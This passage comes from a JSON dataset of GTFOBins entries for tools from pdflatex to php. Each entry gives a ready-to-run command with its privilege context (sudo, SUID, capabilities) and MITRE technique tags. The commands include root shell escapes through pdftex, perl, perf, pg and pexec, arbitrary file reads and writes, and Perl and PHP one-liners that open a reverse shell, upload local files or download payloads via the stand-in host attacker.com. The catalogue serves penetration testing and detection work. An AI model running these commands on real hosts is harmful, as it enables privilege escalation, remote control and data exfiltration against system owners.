output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-write:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-write:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-write:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:shell:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:shell:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:shell:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdftex:shell:0:sudo","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdftex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdftex:shell:0:suid","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdftex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdftex:shell:0:unprivileged","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdftex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perf:shell:0:sudo","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perf stat /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perf:shell:0:suid","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perf stat /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/perf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perf:shell:0:unprivileged","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perf stat /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:download:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>\"attacker.com\",PeerPort=>80,Proto=>\"tcp\") or die; print $s \"GET /path/to/input-file HTTP/1.1\\r\\nHost: attacker.com\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", \"/path/to/output-file\") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:download:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>\"attacker.com\",PeerPort=>80,Proto=>\"tcp\") or die; print $s \"GET /path/to/input-file HTTP/1.1\\r\\nHost: attacker.com\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", \"/path/to/output-file\") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:file-read:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:file-read:0:suid","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:file-read:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:reverse-shell:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"perl -e 'use Socket;$i=\"attacker.com\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:reverse-shell:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"perl -e 'use Socket;$i=\"attacker.com\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:0:capabilities","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perl -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perl -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:1:sudo","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl /dev/null","description":"The `/dev/null` part can be omitted, just use `Ctrl-D` in order to spawn the shell.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:1:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl /dev/null","description":"The `/dev/null` part can be omitted, just use `Ctrl-D` in order to spawn the shell.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:upload:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>\"attacker.com\", PeerPort=>80, Proto=>\"tcp\") or die;open(my $file, \"<\", \"/path/to/input-file\") or die;$content = join(\"\", <$file>);close($file);$headers = \"POST / HTTP/1.1\\r\\nHost: attacker.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($content) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $content;while (<$s>) { }close($s);'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:upload:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>\"attacker.com\", PeerPort=>80, Proto=>\"tcp\") or die;open(my $file, \"<\", \"/path/to/input-file\") or die;$content = join(\"\", <$file>);close($file);$headers = \"POST / HTTP/1.1\\r\\nHost: attacker.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($content) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $content;while (<$s>) { }close($s);'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perlbug:shell:0:sudo","toolId":"gtfo:perlbug","toolName":"perlbug","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'","description":"This requires to press `Enter` serveral times before the shell is spawn.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perlbug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perlbug:shell:0:unprivileged","toolId":"gtfo:perlbug","toolName":"perlbug","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'","description":"This requires to press `Enter` serveral times before the shell is spawn.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perlbug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pexec:shell:0:sudo","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pexec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pexec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pexec:shell:0:suid","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pexec /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pexec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pexec:shell:0:unprivileged","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pexec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pexec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:file-read:0:sudo","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:file-read:0:suid","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:file-read:0:unprivileged","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:shell:0:sudo","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:shell:0:suid","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:shell:0:unprivileged","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:0:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:0:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:1:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:1:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:1:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:2:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:2:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:2:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:download:0:sudo","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:download:0:suid","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 